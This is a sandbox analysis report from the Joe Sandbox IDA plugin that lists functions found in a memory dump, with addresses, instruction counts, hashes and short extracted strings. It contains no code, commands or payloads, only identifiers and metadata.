Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: f039729ed5f3e8b9147ba81b7386ad61a003046dba152e70ee1fc1f941120eba
Instruction ID: e56d036b41e8003dfb1ec166a39063d8093ca929175410a479ec4489164ff4d7
Opcode Fuzzy Hash: f039729ed5f3e8b9147ba81b7386ad61a003046dba152e70ee1fc1f941120eba
Instruction Fuzzy Hash: 3481BF31A0CA498FDB98EF18C8615B977E2FF99740F14456AE44EC32C6DE24AC42C785

Function 00007FF848F3129D Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F31337

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: 498dc815d90ad50181c6587bcb0d5164c10d5f97e3f4ea4589174b7005c3b20f
Instruction ID: ad7651f97f2117ca76431fb1b43a95c79ccbac5c358fd30ef643cccd3301b27c
Opcode Fuzzy Hash: 498dc815d90ad50181c6587bcb0d5164c10d5f97e3f4ea4589174b7005c3b20f
Instruction Fuzzy Hash: 0151B031A1CA898FDB48EF1888655BA77E2FF98344F14457EE44AD3285DF34E842CB85

Function 00007FF848F31CA9 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

xmH, xrefs: 00007FF848F31D63

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: xmH
API String ID: 0-1583574247
Opcode ID: c581134033f0a0e112d8a7885cb1130e09f40244b75180f662b0bc8c1f0e1704
Instruction ID: 925431b897e22834377844062c2694e6e04ef7fc055ff0aab61dd4d65da12460
Opcode Fuzzy Hash: c581134033f0a0e112d8a7885cb1130e09f40244b75180f662b0bc8c1f0e1704
Instruction Fuzzy Hash: 02414771D09A1D8FDB44EB68D4586ECBBF0FF19341F5005AAE009E7291DB38A945CB14

Function 00007FF848F35A29 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

E, xrefs: 00007FF848F35A31

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: c15579f59dcedfa91279fd8e84bfb74d9855f2c83d5f99e7764da12bd88d8b64
Instruction ID: 733f0ece059a9d8d6aca2fc3a4d610236e22f7fc8ebcb50af97994fb901eaa5b
Opcode Fuzzy Hash: c15579f59dcedfa91279fd8e84bfb74d9855f2c83d5f99e7764da12bd88d8b64
Instruction Fuzzy Hash: C1317A71E08A0D8FDB84EB9CD495AADB7F2FF99340F10056AD40DD3285CB39A842CB44

Function 00007FF848F304F2 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

?M_^, xrefs: 00007FF848F30501

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: ?M_^
API String ID: 0-1086198800
Opcode ID: 627f51ec48284fe699ca27bdd27d8905eab2622af1bb9017c92b0feb93cd92f4
Instruction ID: 859b85341cde71fe114cd9ab8b03971d084905f4c92b261b32221eb9a1a8dc85
Opcode Fuzzy Hash: 627f51ec48284fe699ca27bdd27d8905eab2622af1bb9017c92b0feb93cd92f4
Instruction Fuzzy Hash: B601D231A0D65EDFC782FF2CA8911FA7BA0EF41355F04027BE04CCA082EB299555C7A9

Function 00007FF848F304F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

?M_^, xrefs: 00007FF848F30501

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: ?M_^
API String ID: 0-1086198800
Opcode ID: 5071693d411feb0115ad57af4821bcefcb630deedbe80e8b2c2bd4c208d4b589
Instruction ID: 5dd4e7e821db67c554f61e9a0e2426be0171b841bf9408f735e122bbbb295c07
Opcode Fuzzy Hash: 5071693d411feb0115ad57af4821bcefcb630deedbe80e8b2c2bd4c208d4b589
Instruction Fuzzy Hash: 5C01803190D65EDFD791FF2898411F67BA0EF41354F04027AE04CCA182EB299555C7A9

Function 00007FF848F308B1 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

PrH, xrefs: 00007FF848F308EF

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: PrH
API String ID: 0-1462561775
Opcode ID: d0292b667a79e5770e0c9833fe856493e3115e1e1da6a63bf127cd47bedb461e
Instruction ID: 45434c5235abf3b977f811120dd21e43e4c43245bf0c453811539bd7b664fa59
Opcode Fuzzy Hash: d0292b667a79e5770e0c9833fe856493e3115e1e1da6a63bf127cd47bedb461e
Instruction Fuzzy Hash: B1F0A9328186899FE798FB3898992E97FB0FF85340F5400EBD408D6192EF2869698740

Function 00007FF848F36163 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e80fc6d8bd5918717ab23bc04304018989e85463a226d6ff2710784dd76baa9
Instruction ID: 0ab06a049007b5f5e8b850ebeaed0417d503379f77ef78f27af79ee1b5656020
Opcode Fuzzy Hash: 3e80fc6d8bd5918717ab23bc04304018989e85463a226d6ff2710784dd76baa9
Instruction Fuzzy Hash: 6771E570D1991D8FEB94EBA8C8997ADB7B1FF58340F1041AAD00DE3296DF3868818B44

Function 00007FF848F32CF8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b11b1bfafb14019b20d831db084467138e4b240d46e8b1172748b49398a477
Instruction ID: ecf63214113e340a120799a80a0d96f79c04a23d93eea94658d6cfa706218b05
Opcode Fuzzy Hash: b4b11b1bfafb14019b20d831db084467138e4b240d46e8b1172748b49398a477
Instruction Fuzzy Hash: 28410471E1895D8FEB94EBA8D895AECB7F1FF59341F40012AD40DE3292DB74A841CB44

Function 00007FF848F31828 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298022c3a52bcc4f49dcfa44ace672fcc84f938e9c3f670bf4ee779e06630fb0
Instruction ID: 8388297b71e4cde389f2704e53124c24f39b444bbe94bd5294129d40643e7e20
Opcode Fuzzy Hash: 298022c3a52bcc4f49dcfa44ace672fcc84f938e9c3f670bf4ee779e06630fb0
Instruction Fuzzy Hash: 1F317E30C0D61E8EE764BB14D8117FDB2A1FF56380F60027BE44E921C1DF396985CA98

Function 00007FF848F364E9 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9043cddd62ee10cde4541b408185cc458e012575e0cc83fcf0f20e6075e55550
Instruction ID: 8e3c18be196c125869225996841baa89eab11622e4f46a8d737a00dad2f6cb9f
Opcode Fuzzy Hash: 9043cddd62ee10cde4541b408185cc458e012575e0cc83fcf0f20e6075e55550
Instruction Fuzzy Hash: 5F417C70C0D6498FEB96EBA4C4986EDBBB1FF45300F5001BAD009D7296CB385982CB41

Function 00007FF848F35FDD Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71986e282560bde2c5bb84b6125bb37e84b336f2db927e602cb90ff18620cc28
Instruction ID: d5d88ba9d8cfbffe28fbdb55fa33b9a485b8580955c2fbfebff93c5061b5ff9a
Opcode Fuzzy Hash: 71986e282560bde2c5bb84b6125bb37e84b336f2db927e602cb90ff18620cc28
Instruction Fuzzy Hash: C9415B70D2964D9FDB80EB98D8556EEBBB1FF48310F50053AE008E3292DB3868418B95

Function 00007FF848F383F5 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a120b786587480840de0a4ab69251172f297d010b0bd268e6b1510601e21765
Instruction ID: 2c3fe92c0b236d5b77155e7d88460e6295608710377dae535064b2ce43019ac2
Opcode Fuzzy Hash: 8a120b786587480840de0a4ab69251172f297d010b0bd268e6b1510601e21765
Instruction Fuzzy Hash: 1B316471D1D61A8FDB48EFA8E4502FEB7B0EF58301F40017AE009A32C1DB389951DB95

Function 00007FF848F35931 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b595aefce1680f8d2d925c21a43f70cb0f7dc0dbea6e22d81dcf1e3333b4b41f
Instruction ID: 41eca1bcef9694b54ca0f17b3be18325a7f7f8c4790bdd4ec057db96da8b0725
Opcode Fuzzy Hash: b595aefce1680f8d2d925c21a43f70cb0f7dc0dbea6e22d81dcf1e3333b4b41f
Instruction Fuzzy Hash: 1931057080F6CA5FD756AB7884146A9BFB1EF4B360F0904EED089DB193C9186845C712

Function 00007FF848F32BC9 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67af1bad51a09ccdd965b80e5aa18e6ec9343b4d788bfd2b27188c4ec80b4b95
Instruction ID: bf94ba1d67c153a51d92823ad153aebdabf4b6d9bc764be093f34fbec27762c0
Opcode Fuzzy Hash: 67af1bad51a09ccdd965b80e5aa18e6ec9343b4d788bfd2b27188c4ec80b4b95
Instruction Fuzzy Hash: 35312671D0A64D8FDB49EFA8D8946EDBBB1FF58311F10007AE009E3291DB38A940CB95

Function 00007FF848F32428 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7554d169e0ce7e614ed300eb1d36c0b57423fa279829b2828a0d2399408cc6
Instruction ID: f0204ccd5b0443967e24cd84eba50205dc8a540638a546f5b74ada2ea69429f6
Opcode Fuzzy Hash: ef7554d169e0ce7e614ed300eb1d36c0b57423fa279829b2828a0d2399408cc6
Instruction Fuzzy Hash: 5D312471E18A1D8EEBA4EB28C8957A9B7A1FB48341F4041F6D00CE2292DF346A84CB45

Function 00007FF848F3186A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcdd9f21d45c2729e8687309438248699e8e38b529758336178b96fcd7f7319
Instruction ID: fc340ab0c43bd99c787c8cdb0e23d416b5980f8334b4ee8d3fab8d26a7c128da
Opcode Fuzzy Hash: 5fcdd9f21d45c2729e8687309438248699e8e38b529758336178b96fcd7f7319
Instruction Fuzzy Hash: D311F631C0A62D8EDB59EF60D4557FCB2B5EF42341F5010BAE04EA22D2DF396A85CB44

Function 00007FF848F31DF5 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a466c20d9f4ca04d080a78d237a4d5ac1aed8eac5c6e86af7606d3544398e448
Instruction ID: dbd3c43be200116a17aa2d0df737184d79466f4a715c77b70be8b0f121af9435
Opcode Fuzzy Hash: a466c20d9f4ca04d080a78d237a4d5ac1aed8eac5c6e86af7606d3544398e448
Instruction Fuzzy Hash: 5C01193188E3CA5FD7176B608D255A63FA4EF87250F0901F7E088CB0E3DA5D5699C362

Function 00007FF848F31F5D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f981d18b665dc023247a433fb990298a01a8a180c90dc59a77762736d1926c9
Instruction ID: 5b47f537a4d98677a3c4b95062ce3d0f38ec79263b133f3540e23541960b7785
Opcode Fuzzy Hash: 0f981d18b665dc023247a433fb990298a01a8a180c90dc59a77762736d1926c9
Instruction Fuzzy Hash: 77F0C232C0C6899FD345FB3888592ADBFA0FF44240F4400F6E448C71D2EB285999C741

Function 00007FF848F38399 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbc1bbffc2ab3032d471987631b436ee4658025c5c31b3c58cee93a2cfee718
Instruction ID: 3c9086ee08e5dec600c09208a401d2270614189d157d95fc70549c26ce462545
Opcode Fuzzy Hash: 5bbc1bbffc2ab3032d471987631b436ee4658025c5c31b3c58cee93a2cfee718
Instruction Fuzzy Hash: 5DF0377181D68D8FEB42EB6888582ADBFB0FF19300F4504ABD408D6192EB38A548CB51

Function 00007FF848F31258 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a479be7b3d4d8560b611b8ce8323e3a6f329321b9619bbc144f72fcf3176efc
Instruction ID: 11a64a352f9f09f17e64b7977a0ab5e1239fcb5e80a499e40631ed8a603805a3
Opcode Fuzzy Hash: 6a479be7b3d4d8560b611b8ce8323e3a6f329321b9619bbc144f72fcf3176efc
Instruction Fuzzy Hash: 59F08C3080964D8FDB94EF24D8812A57BA0FFA5340F04006AE40CD3581DB76D5A4CB84

Function 00007FF848F30528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3ca110eb765dabe4de564119d97e0fcf0e0ce3dde2c4b9cbbf71732c121032
Instruction ID: d05f642b66c6d57f3e13edb417245c83d96141357f861addab91f4ef3f34f2bd
Opcode Fuzzy Hash: 9c3ca110eb765dabe4de564119d97e0fcf0e0ce3dde2c4b9cbbf71732c121032
Instruction Fuzzy Hash: DFF0583080D64E8FDB95EF2494012EA77A0FF55344F04013AE40CD61C2DB39A5A0CB98

Function 00007FF848F3685C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408c8c991c848b0601b7295e0308d0b25f79cd1a4f09fb9aed896646fad75486
Instruction ID: f070f6ce0ef0f7c97254ca6ce357060601632180c8e668cef17b263f811cca0c
Opcode Fuzzy Hash: 408c8c991c848b0601b7295e0308d0b25f79cd1a4f09fb9aed896646fad75486
Instruction Fuzzy Hash: A8E0DF32D4CA4C8FDB55AFA9AC512E877A0FF8D308F00026AD44CD71C5E7695995C706

Function 00007FF848F31F15 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143325158c1b4237d086ed6fe97531f533bef92c87360d56c66347d84f5d5af2
Instruction ID: f0ee2b44c185f59ac7195a0e551b38ed0647d3ee8f776ffc9bb5c68c53a290eb
Opcode Fuzzy Hash: 143325158c1b4237d086ed6fe97531f533bef92c87360d56c66347d84f5d5af2
Instruction Fuzzy Hash: B3E09A35C0E68A8FD716BF20895A2E9BF60FF42300F0905FBE448860C2EB689168C742

Function 00007FF848F381E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5defbb25ed4fbadcd9a501f67a9a627900cc899bb3c3bae67fb6aefe192453
Instruction ID: 0ac44d93f13d0e1b7ca660ddbd5b5baa380cf25437933feae1d0d2b48ab1541a
Opcode Fuzzy Hash: 8f5defbb25ed4fbadcd9a501f67a9a627900cc899bb3c3bae67fb6aefe192453
Instruction Fuzzy Hash: 24E09A7288CD4C8FCB54AB29AC012987AA1FB89308F41026AD04CD71C1D7299E9AC715

Function 00007FF848F31C19 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b9de652826686444ea1434d73369fa3ca200db063d88afbbc212702b06f2d0
Instruction ID: fe8e5fdd9df592d38c31dbbf507e4c3499fe32124690d0703402b39d0025c828
Opcode Fuzzy Hash: c9b9de652826686444ea1434d73369fa3ca200db063d88afbbc212702b06f2d0
Instruction Fuzzy Hash: 37E0ED3184E3CD8FDB16AB2048951E97F70FF02240F4901BBE048C61D3EB689568C30A

Function 00007FF848F30530 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260e1a7bd5efe034ea0159154c2db9ec0901359223de34b34586799f09093ccd
Instruction ID: c87b88b3b8ac4201b6cb2e7cbba14cf119d91bae1c53c8fb4e6951eae04bec48
Opcode Fuzzy Hash: 260e1a7bd5efe034ea0159154c2db9ec0901359223de34b34586799f09093ccd
Instruction Fuzzy Hash: F7F0393080960D8FDB94EF14D4016AA77A0FF55344F00013AE41CD21C0DB75E5A0CB98

Function 00007FF848F32536 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7611058cfcaf2dc6e60e24969a315bcd4eb296b19c39c1212e675496cedf155
Instruction ID: fd14520cf646323ae4f5c393bf319a398730a65246197fb52f6ade1b5b9228cb
Opcode Fuzzy Hash: e7611058cfcaf2dc6e60e24969a315bcd4eb296b19c39c1212e675496cedf155
Instruction Fuzzy Hash: 81F09E75D1495E8FDBA4EB18C495BA9B7B1FB58341F1086E6800DE3245DB34AE858F80

Function 00007FF848F30C61 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e2256e638958ac7845f6985e91d073b7e406799f052bde7143be95c2e54ae9
Instruction ID: 8ff0bdb308eafaa2565101b09afb61d66fa9ba7d76bf2e2b827e183e058ff606
Opcode Fuzzy Hash: b0e2256e638958ac7845f6985e91d073b7e406799f052bde7143be95c2e54ae9
Instruction Fuzzy Hash: 5EE0B631A1652D4EDB50EB58A8413EEB771FB85351F8001B2954CE2185CA3869418B45

Non-executed Functions

Function 00007FF848F306FA Relevance: 15.2, Strings: 12, Instructions: 190COMMON

Download Yara Rule

Strings

M_^f, xrefs: 00007FF848F30772
`~H, xrefs: 00007FF848F30859
H}H, xrefs: 00007FF848F30849
(}H, xrefs: 00007FF848F30829
=M_^, xrefs: 00007FF848F30701
?M_I, xrefs: 00007FF848F30804
{H, xrefs: 00007FF848F307D9
M_^g, xrefs: 00007FF848F3077A
|H, xrefs: 00007FF848F307E9
M_^U, xrefs: 00007FF848F306FA
8}H, xrefs: 00007FF848F30839
M_^X, xrefs: 00007FF848F30712

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$=M_^$?M_I$H}H$M_^U$M_^X$M_^f$M_^g$`~H${H$|H
API String ID: 0-392637246
Opcode ID: 5b9ca3a0d4ecf27be87cdf2ba7e3d0cc7617faab3563f4313a983e8666b88abb
Instruction ID: 8e0369f0aee40e5a36dd2ba444142946a8dd8a1769c20a3301f9f7a6e196d345
Opcode Fuzzy Hash: 5b9ca3a0d4ecf27be87cdf2ba7e3d0cc7617faab3563f4313a983e8666b88abb
Instruction Fuzzy Hash: 2451F973E0E5898FE215776C7C161B97B90FF92765F5903FBC448870CBEE2898058285

Function 00007FF848F306E0 Relevance: 14.0, Strings: 11, Instructions: 209COMMON

Download Yara Rule

Strings

M_^f, xrefs: 00007FF848F30772
`~H, xrefs: 00007FF848F30859
H}H, xrefs: 00007FF848F30849
(}H, xrefs: 00007FF848F30829
=M_^, xrefs: 00007FF848F30701
?M_I, xrefs: 00007FF848F30804
{H, xrefs: 00007FF848F307D9
M_^g, xrefs: 00007FF848F3077A
|H, xrefs: 00007FF848F307E9
8}H, xrefs: 00007FF848F30839
M_^X, xrefs: 00007FF848F30712

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$=M_^$?M_I$H}H$M_^X$M_^f$M_^g$`~H${H$|H
API String ID: 0-2993760127
Opcode ID: a120f5ac72ab40db3b28d6dc285a326e2b1aaaa18d56d80b22b0e887d81bf0dc
Instruction ID: 9a527d6a14ebce4d97c01d5b21588b9d2defacfb031221e2859d56478932f58b
Opcode Fuzzy Hash: a120f5ac72ab40db3b28d6dc285a326e2b1aaaa18d56d80b22b0e887d81bf0dc
Instruction Fuzzy Hash: 6E51D673E0E68A9FE255776C6C160F97B90FF92665F5803FBC4488B0C7EE1898058295

Function 00007FF848F306A5 Relevance: 14.0, Strings: 11, Instructions: 205COMMON

Download Yara Rule

Strings

M_^f, xrefs: 00007FF848F30772
`~H, xrefs: 00007FF848F30859
H}H, xrefs: 00007FF848F30849
(}H, xrefs: 00007FF848F30829
M_^J, xrefs: 00007FF848F306C2
M_^K, xrefs: 00007FF848F306C9
?M_I, xrefs: 00007FF848F30804
{H, xrefs: 00007FF848F307D9
M_^g, xrefs: 00007FF848F3077A
|H, xrefs: 00007FF848F307E9
8}H, xrefs: 00007FF848F30839

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$?M_I$H}H$M_^J$M_^K$M_^f$M_^g$`~H${H$|H
API String ID: 0-3469480245
Opcode ID: 60e03d1d0272f90a8d21c000ebef735de97824f8d375e8d1018cb50c5df76789
Instruction ID: 735860130c23954a662e1311af2f35d1524b3d08357c49278a5bb046ccb06d64
Opcode Fuzzy Hash: 60e03d1d0272f90a8d21c000ebef735de97824f8d375e8d1018cb50c5df76789
Instruction Fuzzy Hash: C451E973E0E58A8FE615776C7C160B87B90FF92765F6547FBC4448B0C7EE2898068285

Function 00007FF848F33660 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F3372F
8XH, xrefs: 00007FF848F3377B
8XH, xrefs: 00007FF848F33800
8XH, xrefs: 00007FF848F336A2
8XH, xrefs: 00007FF848F3384F

Memory Dump Source

